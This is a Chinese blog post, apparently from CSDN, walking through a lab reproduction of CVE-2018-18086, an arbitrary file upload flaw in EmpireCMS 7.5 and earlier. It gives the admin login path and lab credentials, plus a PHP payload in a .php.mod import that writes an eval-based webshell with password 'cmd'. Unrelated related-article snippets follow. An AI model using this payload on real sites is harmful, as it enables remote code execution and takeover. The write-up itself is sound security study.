empirecms 文件上传 (CVE-2018-18086)

最新推荐文章于 2023-03-21 15:40:37 发布
最新推荐文章于 2023-03-21 15:40:37 发布
阅读量837 收藏 1
点赞数 1
文章标签: 安全 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127152769
版权

一、漏洞描述

EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。

二、影响版本

EmpireCMS<=7.5

三、漏洞复现

  1. 进入靶场,登入后台 http://ip/empirecms/e/admin/,账号/密码:admin/123456。

系统->管理数据表->导入系统模型

 2bf1f4cf9cd3b27bb230d172e168eaf1.png

2.上传*.php.mod文件,填写空格内容,选择马上导入,并确认: 

<?php file_put_contents("sh3ll.php","<?php @eval(\$_POST[cmd]); ?>");?>

 29b37d3c174ba0ef33f0790f8f0606c4.jpeg

 3.访问下看有没有成功解析

 1f5d0be30c6438c631ce435cad0d2ca3.jpeg

 4.webshell管理工具连接http://ip/empirecms/e/admin/shell.php 密码cmd。

 5.获取flag

恸.283
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EmpireCMS文件上传(CVE-2018-18086)
m0_65150886的博客
02-20 386
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。6.上传该文件(数据表名随意填写,我这里填写的是php),点击马上导入。1.访问http://ip:port,出现如下页面,开始实验。4.点击系统,数据表与系统模型,管理数据表,导入系统模型。7.访问上传的getshell文件。2.访问管理员登录界面。
【漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1775
【EmpireCms-文件上传】帝国建站
帝国cms empirecms 文件上传CVE-2018-18086)复现
YouthBelief的博客
11-18 2844
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题empirecms 文件上传CVE-2018-18086)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 empirecms 文件上传CVE-2018-18086) 0x01 漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:a
tomcat漏洞之任意文件上传CVE-2017-12615)
weixin_53711701的博客
12-24 2917
tomcat漏洞之任意文件上传CVE-2017-12615)
CVE-2018-18086
weixin_44770698的博客
03-21 485
CVE-2018-18086
web安全-文件上传漏洞-某CMSCVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1756
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
Tomcat任意文件上传漏洞(CVE-2017-12615)
qq_51331767的博客
02-12 471
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中远程代码执行漏洞(CVE-2017-12615)。一定条件下,攻击者可以利用该漏洞,通过上传的jsp文件,在服务器上执行任意代码,导致数据泄露或权限被获取,存在高安全风险。
EmpireCMS-6.0os-SC-GBK.zip
最新发布
03-09
标题中的"EmpireCMS-6.0os-SC-GBK.zip"指的是该系统的第6.0版本,特别为简体中文环境(SC)设计,并使用GBK编码。GBK编码是中国大陆广泛使用的汉字编码标准,能够包含大部分中文字符,适用于中文网站的建设。 ...
EmpireCMS-BaseDoc
02-07
本系统由帝国开发工作组独立开发,是一个经过完善设计的适用于Linux/... 目前EmpireCMS程序已经广泛应用在国内数十万家网站,覆盖国内上千万上网人群,并经过上千家知名网站的严格检测,被称为国内最稳定的CMS系统。
帝国网站管理系统(EmpireCMS) v7.5 繁体 UTF-8 开源版
10-07
下载解压后的 EmpireCMS_v7.5_TC_UTF8 压缩包,将文件上传至服务器,按照官方提供的安装指南进行数据库配置和初始化设置。完成后,用户可以通过后台管理系统进行日常的网站维护和内容发布。 **总结** EmpireCMS v...
帝国网站管理系统(EmpireCMS) v7.5 简体 UTF-8 开源版
10-07
**帝国网站管理系统(EmpireCMS) v7.5 简体 UTF-8 开源版** **概述** 帝国网站管理系统(EmpireCMS)是一款广泛应用于企业和个人的B/S架构的网站管理平台。它以其安全、稳定、强大和灵活的特性在众多网站管理系统中...
帝国CMS常用函数用法及实例
DreamPHP
10-08 1831
栏目调取: 当前栏目父栏目的调取方法是   $class_r[$GLOBALS[navclassid]][bclassid]; 当前栏目别名的调取方法是    $class_r[$GLOBALS[navclassid]][bname]; 当前栏目子栏目的调取方法是    $class_r[$GLOBALS[navclassid]][sonclass]; 当前栏目子判断是否为终级栏目   
PHP上传文件缺省目录,帝国cms默认图片、附件上传路径/d/file/怎么修改
weixin_28738173的博客
03-18 562
很多朋友问帝国CMS修改附件保存地址不生效如何解决,今天教大家如何将帝国CMS系统的默认文件存放路径/d/file/修改掉,这个功能到底怎么实现呢?这里涉及到后台设置和网站文件的修改,如果只更改后台附件地址是没法生效的,必须还要同时更改网站文件。第一步、帝国cms后台修改默认附件路径进入帝国cms后台,下图后台是美化了的后台,默认后台主题不太好看,这个不影响我们的修改,大家按照系统设置>参数...
帝王cms上传php,帝国cms怎么上传大文件
weixin_39560245的博客
03-26 178
1.一般的文件上传,除非文件很小。就像一个5M的文件,很可能要超过一分钟才能上传完。但在php中,默认的该页最久执行时间为 30 秒。就是说超过30秒,该脚本就停止执行。这就导致出现无法打开网页的情况。这时我们可以修改 max_execution_time查找max_execution_time默认是30秒,改为max_execution_time = 00表示没有相关推荐:《CMS教程》2. 修...
apache 文件上传 (CVE-2017-15715)
weixin_57567689的博客
10-22 540
apache 文件上传 (CVE-2017-15715)
帝国cms的最新漏洞是什么
zj209的专栏
01-03 2722
帝国cms的最新漏洞是什么,因为我的cms网站刚被挂马了,用帝国cms做的。请大侠指导啊
帝国CMS7.5漏洞复现
WFC1006848997的博客
02-06 2204
漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 这个也是比较鸡肋,还是需要弄到管理员权限,登陆到后台。 漏洞复现 源码下载地址:http://www.phome.net/download 然后安装,安装可参考源码提供的 html 文件 测试执行到第三步即可 设置好各个参数后登陆后台,准备复现漏洞,按照下列顺序执...
任意文件上传漏洞修复
qq_31763129的博客
05-09 5360
 一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子)      $fullfilename = $cfg_basedir.$activepath.'/'.$filename;      修改为      if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml...
EmpireCMS_V7.5的一次审计
xiaoi123的博客
10-11 1947
i春秋作家:Qclover 原文来自:EmpireCMS_V7.5的一次审计   EmpireCMS_V7.5的一次审计 1概述    最近在做审计和WAF规则的编写,在CNVD和CNNVD等漏洞平台寻找各类CMS漏洞研究编写规则时顺便抽空对国内一些小的CMS进行了审计,另外也由于代码审计接触时间不是太常,最近一段时间也跟着公司审计项目再次重新的学习代码审计知识,对于入行已久的各位审计...
《帝国网站管理系统》实例入门教程.doc
06-16
这篇教程是针对《帝国网站管理系统》的新手用户,尤其是那些对EmpireCMS没有基础但希望通过它建立网站的用户。教程假设用户具备基本的Dreamweaver使用技能,能够设计简单的表格式模板。教程中提到的网站采用多种技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值